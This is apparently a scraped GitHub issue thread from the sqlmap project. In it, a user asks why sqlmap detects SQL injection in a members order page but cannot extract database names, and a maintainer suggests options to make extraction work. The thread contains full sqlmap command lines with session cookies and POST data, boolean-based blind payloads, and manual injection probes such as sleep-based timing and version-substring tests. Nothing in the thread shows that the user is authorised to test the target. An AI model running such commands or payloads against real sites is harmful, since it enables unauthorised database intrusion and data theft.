-
-
Notifications
You must be signed in to change notification settings - Fork 5.9k
Why sqlmap does not take extract.. #448
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Comments
This is most probably a false positive. Are you able to retrieve anything with it? For example, do you get anything usable with In case that you do, have you tried to use bigger I can guess that you've lowered value for |
Hi dear stamparm I have tried everything but all parameters but it's has been failing i think the version of MYSQL 3 When i try urun=-1 and 91=91 otherwise or 91=91 it gaves me you can't do this message but on the other hand And and 91=73 otherwise or 91=73 or any number if it's not equal shows me a normal page when i try the equal match manuelly it gives me different message and got me redirection to main page.. I am going to try --banner and --time-sec=3 like you said What can we do with sqlmap for MYSQL 3 do you have any recommendation ? I am not actually sure than the DATABASE Type and Version but i got that idea suddenly after my tests that is results.. ./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=toiktqq6phvchisgm3143f7t97" --data="adet=1&fiyat=106.5&kredi=0&rak=0&tarih=08.05.2013%2014:25:04&toplam=106.5&urun=-1*&userid=164328" --batch --banner --time-sec=3
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 08:53:18 custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y sqlmap identified the following injection points with a total of 0 HTTP(s) requests:Place: (custom) POST
[08:53:26] [INFO] the back-end DBMS is MySQL [09:04:23] [INFO] retrieved: web application technology: Apache What can i do more i don't know need your help really.. |
That You said: In that case, you need to make sqlmap work for boolean SQLi. You can try to use |
Thanks for fast reply Yes i guess you are right it's SQLi.. I tried what you said it's still failing.. ./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=toiktqq6phvchisgm3143f7t97" --data="adet=1&fiyat=106.5&kredi=0&rak=0&tarih=08.05.2013%2014:25:04&toplam=106.5&urun=-1*&userid=164328" --batch --banner --text-only --technique=B
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 09:34:37 custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y sqlmap identified the following injection points with a total of 0 HTTP(s) requests:Place: (custom) POST Payload: adet=1&fiyat=19.43&kredi=0.19&rak=0.19&tarih=08.05.2013 00:53:48&toplam=19.43&urun=290 AND 1439=1439&userid=36366[09:34:41] [INFO] the back-end DBMS is MySQL web application technology: Apache |
Ok. This proves that the site is vulnerable. It's highly unprobable that both time-based and boolean-based blind are false positives here. I would suggest you to use For example, maybe this helps: |
Okey i finally found a result i think i must do it manuel because i am having problems with authaction i guess i checked it found the exact time manuel miroslav i did and sleep(33) the server waited for 33 seconds after i did it as and sleep(20) waited 20 seconds now i tried manuelly for and 91=91 it gives me true page and after and 91=73 and any number give me another page but page comes HTTP 200 Just errors different for example TRUE PAGE is always give that result "PROBLEM 4" but FALSE Position Always give "PROBLEM 2" as a text Also you can give me manuel syntax stamparm i can check it immediatly for example how can i find version or something manuelly i tried AND substring(version(),1,1)=5 also 4 it gives me "PROBLEM 2" I mean how can i sure is there a injectiion or not ? Thanks |
Can you please send me a traffic.txt file to
|
have you fix that problem , and I have the thame, for example the next code:
|
@imfenghui in your case it certainly seems like a false positive. "Fix" it with --flush-session |
can I send a traffic.txt file to [email protected] |
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:Place: POST &request=orderQuery&validation=082f85da214aa1b909a7fada54672c28[15:31:42] [WARNING] changes made by tampering scripts are not included in shown payload content(s) |
@imfenghui I wouldn't see one thing usable as it's a boolean based blind. Also, payload like |
thank for your advice, i think it false-positive . |
nope i got the same Von: 麋鹿迷路的迷 [mailto:[email protected]] have you fix that problem , and I have the thame, for example the next code: sqlmap identified the following injection points with a total of 0 HTTP(s) requests: Place: POST &request=orderQuery&validation=082f85da214aa1b909a7fada54672c28 [14:54:20] [INFO] the back-end DBMS is MySQL banner: dIIEE### IIEEEIJIEJ%J%*%%EEzK%S###%EEEEIIES%J%#/#%EE%#%z IIEIEEE%## IIE%%%F [14:57:41] [WARNING] HTTP error codes detected during run: — |
Hi guys
I want to consult about my problem..In my tests sqlmap found a injection point but i could not extract the database names or anything it must be firewall or something i don't know but that is my situation
./sqlmap.py -u "http://www.test.com/members/siparis.php" --cookie="PHPSESSID=8gj5e2lo706l8r3q3qtgdk6192" --data="adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013%2015:22:03&toplam=50&urun=386*&userid=164107" --dbs --batch --no-cast
This is the situation
custom injection marking character ('*') found in option '--data'. Do you want to process it? [Y/n/q] Y
[11:01:02] [INFO] resuming back-end DBMS 'mysql'
[11:01:02] [INFO] testing connection to the target URL
[11:01:03] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Place: (custom) POST
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: adet=1&fiyat=50&kredi=0&rak=0&tarih=07.05.2013 15:22:03&toplam=50&urun=386 AND 2875=2875&userid=164107
[11:01:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[11:01:03] [INFO] fetching database names
[11:01:03] [INFO] fetching number of databases
[11:01:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:03] [INFO] retrieved:
[11:01:05] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[11:01:12] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[11:01:13] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:01:13] [ERROR] unable to retrieve the number of databases
[11:01:13] [INFO] falling back to current database
[11:01:13] [INFO] fetching current database
[11:01:13] [INFO] resumed: \n
available databases [1]:
[*]
The text was updated successfully, but these errors were encountered: